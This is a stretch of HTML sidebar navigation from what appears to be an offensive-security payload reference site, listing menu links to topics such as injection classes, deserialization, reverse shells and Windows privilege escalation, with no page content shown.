<span class="md-ellipsis">
Dom Clobbering
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_19_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_19">
<span class="md-nav__icon md-icon"></span>
Dom Clobbering
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Dom%20Clobbering/" class="md-nav__link">
<span class="md-ellipsis">
Dom Clobbering
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_20" >
<label class="md-nav__link" for="__nav_20" id="__nav_20_label" tabindex="0">
<span class="md-ellipsis">
File Inclusion
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_20_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_20">
<span class="md-nav__icon md-icon"></span>
File Inclusion
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../File%20Inclusion/" class="md-nav__link">
<span class="md-ellipsis">
File Inclusion
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_21" >
<label class="md-nav__link" for="__nav_21" id="__nav_21_label" tabindex="0">
<span class="md-ellipsis">
Google Web Toolkit
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_21_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_21">
<span class="md-nav__icon md-icon"></span>
Google Web Toolkit
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Google%20Web%20Toolkit/" class="md-nav__link">
<span class="md-ellipsis">
Google Web Toolkit
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_22" >
<label class="md-nav__link" for="__nav_22" id="__nav_22_label" tabindex="0">
<span class="md-ellipsis">
GraphQL Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_22_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_22">
<span class="md-nav__icon md-icon"></span>
GraphQL Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../GraphQL%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
GraphQL Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_23" >
<label class="md-nav__link" for="__nav_23" id="__nav_23_label" tabindex="0">
<span class="md-ellipsis">
HTTP Parameter Pollution
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_23_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_23">
<span class="md-nav__icon md-icon"></span>
HTTP Parameter Pollution
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../HTTP%20Parameter%20Pollution/" class="md-nav__link">
<span class="md-ellipsis">
HTTP Parameter Pollution
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_24" >
<label class="md-nav__link" for="__nav_24" id="__nav_24_label" tabindex="0">
<span class="md-ellipsis">
Hidden Parameters
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_24_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_24">
<span class="md-nav__icon md-icon"></span>
Hidden Parameters
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Hidden%20Parameters/" class="md-nav__link">
<span class="md-ellipsis">
HTTP Hidden Parameters
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_25" >
<label class="md-nav__link" for="__nav_25" id="__nav_25_label" tabindex="0">
<span class="md-ellipsis">
Insecure Deserialization
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_25_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_25">
<span class="md-nav__icon md-icon"></span>
Insecure Deserialization
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Insecure%20Deserialization/" class="md-nav__link">
<span class="md-ellipsis">
Insecure Deserialization
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Insecure%20Deserialization/DotNET/" class="md-nav__link">
<span class="md-ellipsis">
.NET Serialization
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Insecure%20Deserialization/Java/" class="md-nav__link">
<span class="md-ellipsis">
Java Deserialization
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Insecure%20Deserialization/Node/" class="md-nav__link">
<span class="md-ellipsis">
Node Deserialization
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Insecure%20Deserialization/PHP/" class="md-nav__link">
<span class="md-ellipsis">
PHP Deserialization
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Insecure%20Deserialization/Python/" class="md-nav__link">
<span class="md-ellipsis">
Python Deserialization
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Insecure%20Deserialization/Ruby/" class="md-nav__link">
<span class="md-ellipsis">
Ruby Deserialization
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Insecure%20Deserialization/YAML/" class="md-nav__link">
<span class="md-ellipsis">
YAML Deserialization
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_26" >
<label class="md-nav__link" for="__nav_26" id="__nav_26_label" tabindex="0">
<span class="md-ellipsis">
Insecure Direct Object References
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_26_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_26">
<span class="md-nav__icon md-icon"></span>
Insecure Direct Object References
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Insecure%20Direct%20Object%20References/" class="md-nav__link">
<span class="md-ellipsis">
Insecure Direct Object References
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_27" >
<label class="md-nav__link" for="__nav_27" id="__nav_27_label" tabindex="0">
<span class="md-ellipsis">
Insecure Management Interface
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_27_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_27">
<span class="md-nav__icon md-icon"></span>
Insecure Management Interface
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Insecure%20Management%20Interface/" class="md-nav__link">
<span class="md-ellipsis">
Insecure Management Interface
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_28" >
<label class="md-nav__link" for="__nav_28" id="__nav_28_label" tabindex="0">
<span class="md-ellipsis">
Insecure Randomness
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_28_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_28">
<span class="md-nav__icon md-icon"></span>
Insecure Randomness
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Insecure%20Randomness/" class="md-nav__link">
<span class="md-ellipsis">
Insecure Randomness
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_29" >
<label class="md-nav__link" for="__nav_29" id="__nav_29_label" tabindex="0">
<span class="md-ellipsis">
Insecure Source Code Management
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_29_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_29">
<span class="md-nav__icon md-icon"></span>
Insecure Source Code Management
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Insecure%20Source%20Code%20Management/" class="md-nav__link">
<span class="md-ellipsis">
Insecure Source Code Management
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_30" >
<label class="md-nav__link" for="__nav_30" id="__nav_30_label" tabindex="0">
<span class="md-ellipsis">
JSON Web Token
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_30_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_30">
<span class="md-nav__icon md-icon"></span>
JSON Web Token
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../JSON%20Web%20Token/" class="md-nav__link">
<span class="md-ellipsis">
JWT - JSON Web Token
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_31" >
<label class="md-nav__link" for="__nav_31" id="__nav_31_label" tabindex="0">
<span class="md-ellipsis">
Java RMI
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_31_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_31">
<span class="md-nav__icon md-icon"></span>
Java RMI
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Java%20RMI/" class="md-nav__link">
<span class="md-ellipsis">
Java RMI
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_32" >
<label class="md-nav__link" for="__nav_32" id="__nav_32_label" tabindex="0">
<span class="md-ellipsis">
Kubernetes
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_32_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_32">
<span class="md-nav__icon md-icon"></span>
Kubernetes
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Kubernetes/" class="md-nav__link">
<span class="md-ellipsis">
Kubernetes
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_33" >
<label class="md-nav__link" for="__nav_33" id="__nav_33_label" tabindex="0">
<span class="md-ellipsis">
LDAP Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_33_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_33">
<span class="md-nav__icon md-icon"></span>
LDAP Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../LDAP%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
LDAP Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_34" >
<label class="md-nav__link" for="__nav_34" id="__nav_34_label" tabindex="0">
<span class="md-ellipsis">
LaTeX Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_34_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_34">
<span class="md-nav__icon md-icon"></span>
LaTeX Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../LaTeX%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
LaTex Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_35" >
<label class="md-nav__link" for="__nav_35" id="__nav_35_label" tabindex="0">
<span class="md-ellipsis">
Mass Assignment
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_35_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_35">
<span class="md-nav__icon md-icon"></span>
Mass Assignment
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Mass%20Assignment/" class="md-nav__link">
<span class="md-ellipsis">
Mass Assignment
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_36" >
<label class="md-nav__link" for="__nav_36" id="__nav_36_label" tabindex="0">
<span class="md-ellipsis">
Methodology and Resources
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_36_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_36">
<span class="md-nav__icon md-icon"></span>
Methodology and Resources
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Active%20Directory%20Attack/" class="md-nav__link">
<span class="md-ellipsis">
Active Directory Attacks
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Bind%20Shell%20Cheatsheet/" class="md-nav__link">
<span class="md-ellipsis">
Bind Shell
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Cloud%20-%20AWS%20Pentest/" class="md-nav__link">
<span class="md-ellipsis">
Cloud - AWS
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Cloud%20-%20Azure%20Pentest/" class="md-nav__link">
<span class="md-ellipsis">
Cloud - Azure
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Cobalt%20Strike%20-%20Cheatsheet/" class="md-nav__link">
<span class="md-ellipsis">
Cobalt Strike
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Container%20-%20Docker%20Pentest/" class="md-nav__link">
<span class="md-ellipsis">
Container - Docker
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Container%20-%20Kubernetes%20Pentest/" class="md-nav__link">
<span class="md-ellipsis">
Container - Kubernetes
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Escape%20Breakout/" class="md-nav__link">
<span class="md-ellipsis">
Application Escape and Breakout
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/HTML%20Smuggling/" class="md-nav__link">
<span class="md-ellipsis">
HTML Smuggling
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Hash%20Cracking/" class="md-nav__link">
<span class="md-ellipsis">
Hash Cracking
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Initial%20Access/" class="md-nav__link">
<span class="md-ellipsis">
Initial Access
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Linux%20-%20Evasion/" class="md-nav__link">
<span class="md-ellipsis">
Linux - Evasion
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Linux%20-%20Persistence/" class="md-nav__link">
<span class="md-ellipsis">
Linux - Persistence
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation/" class="md-nav__link">
<span class="md-ellipsis">
Linux - Privilege Escalation
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/MSSQL%20Server%20-%20Cheatsheet/" class="md-nav__link">
<span class="md-ellipsis">
MSSQL Server
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Metasploit%20-%20Cheatsheet/" class="md-nav__link">
<span class="md-ellipsis">
Metasploit
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Methodology%20and%20enumeration/" class="md-nav__link">
<span class="md-ellipsis">
Bug Hunting Methodology and Enumeration
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Miscellaneous%20-%20Tricks/" class="md-nav__link">
<span class="md-ellipsis">
Miscellaneous & Tricks
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Network%20Discovery/" class="md-nav__link">
<span class="md-ellipsis">
Network Discovery
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Network%20Pivoting%20Techniques/" class="md-nav__link">
<span class="md-ellipsis">
Network Pivoting Techniques
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Office%20-%20Attacks/" class="md-nav__link">
<span class="md-ellipsis">
Office - Attacks
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Powershell%20-%20Cheatsheet/" class="md-nav__link">
<span class="md-ellipsis">
Powershell
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet/" class="md-nav__link">
<span class="md-ellipsis">
Reverse Shell Cheat Sheet
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Source%20Code%20Management/" class="md-nav__link">
<span class="md-ellipsis">
Source Code Management & CI/CD Compromise
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Subdomains%20Enumeration/" class="md-nav__link">
<span class="md-ellipsis">
Subdomains Enumeration
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Vulnerability%20Reports/" class="md-nav__link">
<span class="md-ellipsis">
Vulnerability Reports
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Windows%20-%20AMSI%20Bypass/" class="md-nav__link">
<span class="md-ellipsis">
Windows - AMSI Bypass
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Windows%20-%20DPAPI/" class="md-nav__link">
<span class="md-ellipsis">
Windows - DPAPI
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Windows%20-%20Defenses/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Defenses
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Windows%20-%20Download%20and%20Execute/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Download and execute methods
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Windows%20-%20Mimikatz/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Mimikatz
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Windows%20-%20Persistence/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Persistence
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Privilege Escalation
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../Methodology%20and%20Resources/Windows%20-%20Using%20credentials/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Using credentials
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_37" >
<label class="md-nav__link" for="__nav_37" id="__nav_37_label" tabindex="0">
<span class="md-ellipsis">
NoSQL Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_37_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_37">
<span class="md-nav__icon md-icon"></span>
NoSQL Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../NoSQL%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
NoSQL Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_38" >
<label class="md-nav__link" for="__nav_38" id="__nav_38_label" tabindex="0">
<span class="md-ellipsis">
OAuth Misconfiguration
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_38_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_38">
<span class="md-nav__icon md-icon"></span>
OAuth Misconfiguration
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../OAuth%20Misconfiguration/" class="md-nav__link">
<span class="md-ellipsis">
OAuth Misconfiguration
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_39" >
<label class="md-nav__link" for="__nav_39" id="__nav_39_label" tabindex="0">
<span class="md-ellipsis">
Open Redirect
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_39_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_39">
<span class="md-nav__icon md-icon"></span>
Open Redirect
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Open%20Redirect/" class="md-nav__link">
<span class="md-ellipsis">
Open URL Redirection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_40" >
<label class="md-nav__link" for="__nav_40" id="__nav_40_label" tabindex="0">
<span class="md-ellipsis">
Prompt Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_40_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_40">
<span class="md-nav__icon md-icon"></span>
Prompt Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Prompt%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Prompt Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_41" >
<label class="md-nav__link" for="__nav_41" id="__nav_41_label" tabindex="0">
<span class="md-ellipsis">
Prototype Pollution
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_41_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_41">
<span class="md-nav__icon md-icon"></span>
Prototype Pollution
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Prototype%20Pollution/" class="md-nav__link">
<span class="md-ellipsis">
Prototype Pollution
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_42" >
<label class="md-nav__link" for="__nav_42" id="__nav_42_label" tabindex="0">
<span class="md-ellipsis">
Race Condition
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_42_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_42">
<span class="md-nav__icon md-icon"></span>
Race Condition
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Race%20Condition/" class="md-nav__link">
<span class="md-ellipsis">
Race Condition
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_43" >
<label class="md-nav__link" for="__nav_43" id="__nav_43_label" tabindex="0">
<span class="md-ellipsis">
Request Smuggling
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_43_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_43">
<span class="md-nav__icon md-icon"></span>
Request Smuggling
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Request%20Smuggling/" class="md-nav__link">
<span class="md-ellipsis">
Request Smuggling
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_44" >
<label class="md-nav__link" for="__nav_44" id="__nav_44_label" tabindex="0">
<span class="md-ellipsis">
SAML Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_44_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_44">
<span class="md-nav__icon md-icon"></span>
SAML Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../SAML%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
SAML Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_45" >
<label class="md-nav__link" for="__nav_45" id="__nav_45_label" tabindex="0">
<span class="md-ellipsis">
SQL Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_45_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_45">
<span class="md-nav__icon md-icon"></span>
SQL Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../SQL%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
SQL Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../SQL%20Injection/BigQuery%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Google BigQuery SQL Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../SQL%20Injection/Cassandra%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Cassandra Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../SQL%20Injection/DB2%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
DB2 Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../SQL%20Injection/HQL%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Hibernate Query Language Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../SQL%20Injection/MSSQL%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
MSSQL Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../SQL%20Injection/MySQL%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
MySQL Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../SQL%20Injection/OracleSQL%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Oracle SQL Injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../SQL%20Injection/PostgreSQL%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
PostgreSQL injection
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../SQL%20Injection/SQLite%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
SQLite Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_46" >
<label class="md-nav__link" for="__nav_46" id="__nav_46_label" tabindex="0">
<span class="md-ellipsis">
Server Side Include Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_46_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_46">
<span class="md-nav__icon md-icon"></span>
Server Side Include Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Server%20Side%20Include%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Server Side Include Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_47" >
<label class="md-nav__link" for="__nav_47" id="__nav_47_label" tabindex="0">
<span class="md-ellipsis">
Server Side Request Forgery
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_47_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_47">
<span class="md-nav__icon md-icon"></span>
Server Side Request Forgery
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Server%20Side%20Request%20Forgery/" class="md-nav__link">
<span class="md-ellipsis">
Server-Side Request Forgery
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_48" >
<label class="md-nav__link" for="__nav_48" id="__nav_48_label" tabindex="0">
<span class="md-ellipsis">
Server Side Template Injection
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_48_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_48">
<span class="md-nav__icon md-icon"></span>
Server Side Template Injection
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../Server%20Side%20Template%20Injection/" class="md-nav__link">
<span class="md-ellipsis">
Server Side Template Injection
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_49" >
<label class="md-nav__link" for="__nav_49" id="__nav_49_label" tabindex="0">
<span class="md-ellipsis">
Tabnabbing
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_49_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_49">
<span class="md-nav__icon md-icon"></span>
Tabnabbing
</label>
